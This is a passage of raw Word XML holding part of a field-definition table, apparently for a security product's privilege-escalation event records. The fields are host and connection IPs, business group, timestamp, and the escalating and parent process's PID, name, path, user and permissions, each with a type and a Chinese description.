            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CE29DA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CC63CDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C1A1BDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F08AA0E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BD747B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CE6C172" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B981252" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2403C0D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42A6F482" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A70A14B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DE89BA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FA8349A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32F6D71B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7C8F1FD6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19FF06EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67B99AEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56792DFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01E65673" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B55FC2D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19C55F70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43EB1E7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DFD49DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6907CD25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="02B6358A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CB82E3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20D245DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DCEB3C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DD3D599" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="476F6A0D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23309247" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1968688B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="557F5032" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103474BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="65BE9A99" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18444413" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DF44E18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7064A33E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FD76806" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="561A5E6E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C3DD96A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BCA9EAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37367DFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="408C014B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="429C0D69" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CA5870A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>procPid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="053A65C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C5E256F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32CECD05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>提权进程</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E0CB921" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77BB51C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>procName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="683C466E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B66EAC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66491DE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>提权进程</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23EE4620" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6926DFC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>procPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1363EFB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BF04D8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CDBB652" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>提权进程</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D86A172" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07050768" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>procUserName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66F9C2B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16B017EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C922447" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>提权用户</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F43A229" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00EC4A64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>procGroupName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03EE85BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="708D9254" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="023390B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42AFD063" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30B0C508" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>procFileMode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08838EFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A113389" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40F2EE61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>完整文件权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D1AB543" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DDA34F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentProcPid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="672DC642" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="621BC18B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DDCDD17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="601548A7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04A8B97D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentProcName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57E0A47C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60130C1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55C4203B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="766E6C70" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B912AFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentProcPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B2A7968" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27807AA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
